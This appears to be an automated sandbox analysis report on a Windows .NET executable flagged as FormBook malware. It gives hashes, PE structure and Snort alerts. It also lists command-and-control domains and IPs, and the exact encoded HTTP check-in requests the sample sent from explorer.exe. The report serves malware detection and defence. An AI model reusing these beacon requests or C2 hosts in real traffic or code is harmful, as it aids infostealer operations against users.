                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.020722508001574
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:20210113432.exe
                                                    File size:1070592
                                                    MD5:13dbc9c1c5a2811ecbee5f420c9c75b6
                                                    SHA1:6b01e540d3757944b61baa187159a908e170d5ae
                                                    SHA256:ba41656ca5e0e243cff9f6a536c43998a9dbc492f5e813a0022e84359b2e0ef8
                                                    SHA512:ae1414b91ba91a29575901ac0daf55aa937454b1afcd53d7d0c9461ca2b48d65bb1f3213ad23853987a40381a2f57be359fdbf7848ff57432b5e95ffd4cbcea1
                                                    SSDEEP:12288:snFhpCARzgXcLcSQgjKyetszECz09YadnGPqZYigRWuyuc28RhXb:s1LzgXcg+jKnkECuHnAqq/RWuy68Rd
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............P..J...........h... ........@.. ....................................@................................

                                                    File Icon

                                                    Icon Hash:00828e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x506886
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x5FFE978E [Wed Jan 13 06:47:42 2021 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1068340x4f.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1080000x60c.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x10a0000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x10488c0x104a00False0.560206834532data7.02780570419IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc0x1080000x60c0x800False0.3369140625data3.46177220497IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x10a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_VERSION0x1080900x37adata
                                                    RT_MANIFEST0x10841c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Version Infos

                                                    DescriptionData
                                                    Translation0x0000 0x04b0
                                                    LegalCopyrightCopyright 2015
                                                    Assembly Version5.77.0.0
                                                    InternalNamePackingSize.exe
                                                    FileVersion5.77.0.0
                                                    CompanyNameIdentityObject LTD
                                                    LegalTrademarks
                                                    CommentsBitConverter
                                                    ProductNameBitConverter
                                                    ProductVersion5.77.0.0
                                                    FileDescriptionBitConverter
                                                    OriginalFilenamePackingSize.exe

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    01/13/21-21:28:09.654078TCP1201ATTACK-RESPONSES 403 Forbidden804975634.102.136.180192.168.2.7
                                                    01/13/21-21:28:30.659590TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975780192.168.2.774.208.236.28
                                                    01/13/21-21:28:30.659590TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975780192.168.2.774.208.236.28
                                                    01/13/21-21:28:30.659590TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975780192.168.2.774.208.236.28
                                                    01/13/21-21:29:11.660530TCP1201ATTACK-RESPONSES 403 Forbidden804975934.102.136.180192.168.2.7

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 13, 2021 21:28:09.474320889 CET4975680192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:28:09.514507055 CET804975634.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:28:09.514614105 CET4975680192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:28:09.514786005 CET4975680192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:28:09.554968119 CET804975634.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:28:09.654078007 CET804975634.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:28:09.654102087 CET804975634.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:28:09.654325008 CET4975680192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:28:09.654438019 CET4975680192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:28:09.694464922 CET804975634.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:28:30.491645098 CET4975780192.168.2.774.208.236.28
                                                    Jan 13, 2021 21:28:30.659271002 CET804975774.208.236.28192.168.2.7
                                                    Jan 13, 2021 21:28:30.659426928 CET4975780192.168.2.774.208.236.28
                                                    Jan 13, 2021 21:28:30.659590006 CET4975780192.168.2.774.208.236.28
                                                    Jan 13, 2021 21:28:30.827095985 CET804975774.208.236.28192.168.2.7
                                                    Jan 13, 2021 21:28:31.162807941 CET4975780192.168.2.774.208.236.28
                                                    Jan 13, 2021 21:28:31.261763096 CET804975774.208.236.28192.168.2.7
                                                    Jan 13, 2021 21:28:31.261784077 CET804975774.208.236.28192.168.2.7
                                                    Jan 13, 2021 21:28:31.261873007 CET4975780192.168.2.774.208.236.28
                                                    Jan 13, 2021 21:28:31.261960030 CET4975780192.168.2.774.208.236.28
                                                    Jan 13, 2021 21:28:31.330554008 CET804975774.208.236.28192.168.2.7
                                                    Jan 13, 2021 21:28:31.330646992 CET4975780192.168.2.774.208.236.28
                                                    Jan 13, 2021 21:28:51.561528921 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:28:51.751950026 CET8049758184.168.131.241192.168.2.7
                                                    Jan 13, 2021 21:28:51.753366947 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:28:54.564081907 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:29:00.565367937 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:29:00.767661095 CET8049758184.168.131.241192.168.2.7
                                                    Jan 13, 2021 21:29:00.768584013 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:29:00.768748045 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:29:01.283525944 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:29:01.818743944 CET8049758184.168.131.241192.168.2.7
                                                    Jan 13, 2021 21:29:01.819772005 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:29:03.768001080 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:29:03.818861961 CET8049758184.168.131.241192.168.2.7
                                                    Jan 13, 2021 21:29:03.820911884 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:29:04.004724979 CET8049758184.168.131.241192.168.2.7
                                                    Jan 13, 2021 21:29:06.017481089 CET8049758184.168.131.241192.168.2.7
                                                    Jan 13, 2021 21:29:06.017591000 CET4975880192.168.2.7184.168.131.241
                                                    Jan 13, 2021 21:29:11.480622053 CET4975980192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:29:11.520770073 CET804975934.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:29:11.520915031 CET4975980192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:29:11.521064043 CET4975980192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:29:11.561067104 CET804975934.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:29:11.660530090 CET804975934.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:29:11.660566092 CET804975934.102.136.180192.168.2.7
                                                    Jan 13, 2021 21:29:11.660778046 CET4975980192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:29:12.459778070 CET4975980192.168.2.734.102.136.180
                                                    Jan 13, 2021 21:29:12.499941111 CET804975934.102.136.180192.168.2.7

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 13, 2021 21:26:13.953279018 CET53645698.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:14.781059027 CET5281653192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:14.829000950 CET53528168.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:15.835195065 CET5078153192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:15.886240959 CET53507818.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:16.856674910 CET5423053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:16.904561043 CET53542308.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:18.084306002 CET5491153192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:18.135071039 CET53549118.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:18.876074076 CET4995853192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:18.923924923 CET53499588.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:19.670840979 CET5086053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:19.718683958 CET53508608.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:20.868812084 CET5045253192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:20.921554089 CET53504528.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:23.229006052 CET5973053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:23.279880047 CET53597308.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:25.162133932 CET5931053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:25.210072041 CET53593108.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:26.380721092 CET5191953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:26.431509972 CET53519198.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:27.509810925 CET6429653192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:27.560648918 CET53642968.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:33.432677984 CET5668053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:33.490365028 CET53566808.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:44.839874983 CET5882053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:44.890532017 CET53588208.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:26:51.334427118 CET6098353192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:26:51.391041040 CET53609838.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:04.145936966 CET4924753192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:04.210891962 CET53492478.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:10.961987972 CET5228653192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:11.019543886 CET53522868.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:15.879688025 CET5606453192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:15.939393997 CET53560648.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:16.699513912 CET6374453192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:16.747385979 CET53637448.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:17.357705116 CET6145753192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:17.416974068 CET53614578.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:17.889926910 CET5836753192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:17.953469992 CET53583678.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:18.834697008 CET6059953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:18.882541895 CET53605998.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:18.997663021 CET5957153192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:19.054007053 CET53595718.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:19.627545118 CET5268953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:19.675343990 CET53526898.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:20.443139076 CET5029053192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:20.500231981 CET53502908.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:21.676707029 CET6042753192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:21.724482059 CET53604278.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:22.729760885 CET5620953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:22.788852930 CET53562098.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:23.225528955 CET5958253192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:23.282030106 CET53595828.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:26.635231018 CET6094953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:26.933274031 CET53609498.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:42.913903952 CET5854253192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:42.973519087 CET53585428.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:47.137257099 CET5917953192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:47.199104071 CET53591798.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:27:47.372279882 CET6092753192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:27:47.424484968 CET53609278.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:28:05.201100111 CET5785453192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:28:05.251754999 CET53578548.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:28:09.402024031 CET6202653192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:28:09.469573975 CET53620268.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:28:30.421834946 CET5945353192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:28:30.490278959 CET53594538.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:28:51.499365091 CET6246853192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:28:51.560517073 CET53624688.8.8.8192.168.2.7
                                                    Jan 13, 2021 21:29:11.418458939 CET5256353192.168.2.78.8.8.8
                                                    Jan 13, 2021 21:29:11.479146957 CET53525638.8.8.8192.168.2.7

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Jan 13, 2021 21:27:26.635231018 CET192.168.2.78.8.8.80x2cc4Standard query (0)www.semaindustrial.comA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:27:47.137257099 CET192.168.2.78.8.8.80x2af9Standard query (0)www.trinewstyles.comA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:28:09.402024031 CET192.168.2.78.8.8.80x44cStandard query (0)www.miproper.comA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:28:30.421834946 CET192.168.2.78.8.8.80x750cStandard query (0)www.fordexplorerproblems.comA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:28:51.499365091 CET192.168.2.78.8.8.80x5754Standard query (0)www.southsideflooringcreations.comA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:29:11.418458939 CET192.168.2.78.8.8.80xd13aStandard query (0)www.exoticorganicwine.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Jan 13, 2021 21:27:26.933274031 CET8.8.8.8192.168.2.70x2cc4Server failure (2)www.semaindustrial.comnonenoneA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:27:47.199104071 CET8.8.8.8192.168.2.70x2af9Name error (3)www.trinewstyles.comnonenoneA (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:28:09.469573975 CET8.8.8.8192.168.2.70x44cNo error (0)www.miproper.commiproper.comCNAME (Canonical name)IN (0x0001)
                                                    Jan 13, 2021 21:28:09.469573975 CET8.8.8.8192.168.2.70x44cNo error (0)miproper.com34.102.136.180A (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:28:30.490278959 CET8.8.8.8192.168.2.70x750cNo error (0)www.fordexplorerproblems.com74.208.236.28A (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:28:51.560517073 CET8.8.8.8192.168.2.70x5754No error (0)www.southsideflooringcreations.comsouthsideflooringcreations.comCNAME (Canonical name)IN (0x0001)
                                                    Jan 13, 2021 21:28:51.560517073 CET8.8.8.8192.168.2.70x5754No error (0)southsideflooringcreations.com184.168.131.241A (IP address)IN (0x0001)
                                                    Jan 13, 2021 21:29:11.479146957 CET8.8.8.8192.168.2.70xd13aNo error (0)www.exoticorganicwine.comexoticorganicwine.comCNAME (Canonical name)IN (0x0001)
                                                    Jan 13, 2021 21:29:11.479146957 CET8.8.8.8192.168.2.70xd13aNo error (0)exoticorganicwine.com34.102.136.180A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • www.miproper.com
                                                    • www.fordexplorerproblems.com
                                                    • www.southsideflooringcreations.com
                                                    • www.exoticorganicwine.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.74975634.102.136.18080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 13, 2021 21:28:09.514786005 CET4960OUTGET /dkk/?J49Tz=eln47v8hVLB&EvI=KFec6V/xGjD6cE5qsvd2LTm4Ze1Ufxo42AYbq86iepN500M2vfXbQq6XlD5K+sbe3doaSuc2kQ== HTTP/1.1
                                                    Host: www.miproper.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 13, 2021 21:28:09.654078007 CET4960INHTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Wed, 13 Jan 2021 20:28:09 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "5ffc83a2-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.74975774.208.236.2880C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 13, 2021 21:28:30.659590006 CET4962OUTGET /dkk/?EvI=VuWlRtEQc0PyYNliE71gHvEq4u/XFVndbD6PF4RlFVBK20m1fz7CdpGmHTE9G7iYyzSgqX7WhA==&J49Tz=eln47v8hVLB HTTP/1.1
                                                    Host: www.fordexplorerproblems.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 13, 2021 21:28:31.261763096 CET4962INHTTP/1.1 301 Moved Permanently
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Date: Wed, 13 Jan 2021 20:28:30 GMT
                                                    Server: Apache
                                                    X-Powered-By: PHP/7.4.14
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    X-Redirect-By: WordPress
                                                    Location: https://www.fordexplorerproblems.com/dkk/?EvI=VuWlRtEQc0PyYNliE71gHvEq4u/XFVndbD6PF4RlFVBK20m1fz7CdpGmHTE9G7iYyzSgqX7WhA==&J49Tz=eln47v8hVLB
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.749758184.168.131.24180C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 13, 2021 21:29:00.768748045 CET4963OUTGET /dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg== HTTP/1.1
                                                    Host: www.southsideflooringcreations.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 13, 2021 21:29:03.768001080 CET4964OUTGET /dkk/?J49Tz=eln47v8hVLB&EvI=7pEhCqXKdTe1QojMxaT2YAvmPyLKOFb2Iw59nqg2WrUGKA2vL6+QIvazxlaHaXA0UWVS/p1klg== HTTP/1.1
                                                    Host: www.southsideflooringcreations.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    3192.168.2.74975934.102.136.18080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 13, 2021 21:29:11.521064043 CET4965OUTGET /dkk/?EvI=Pne6zO+Z3a60Au06FHOmVrHS7z/OeLQppxmg+doCWmhHZjdmG5KKLECfP4ZcwEOpNG8I7WvO0Q==&J49Tz=eln47v8hVLB HTTP/1.1
                                                    Host: www.exoticorganicwine.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 13, 2021 21:29:11.660530090 CET4966INHTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Wed, 13 Jan 2021 20:29:11 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "5ffc838f-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Code Manipulations

                                                    User Modules

                                                    Hook Summary

                                                    Function NameHook TypeActive in Processes
                                                    PeekMessageAINLINEexplorer.exe
                                                    PeekMessageWINLINEexplorer.exe
                                                    GetMessageWINLINEexplorer.exe
                                                    GetMessageAINLINEexplorer.exe

                                                    Processes

                                                    Process: explorer.exe, Module: user32.dll
                                                    Function NameHook TypeNew Data
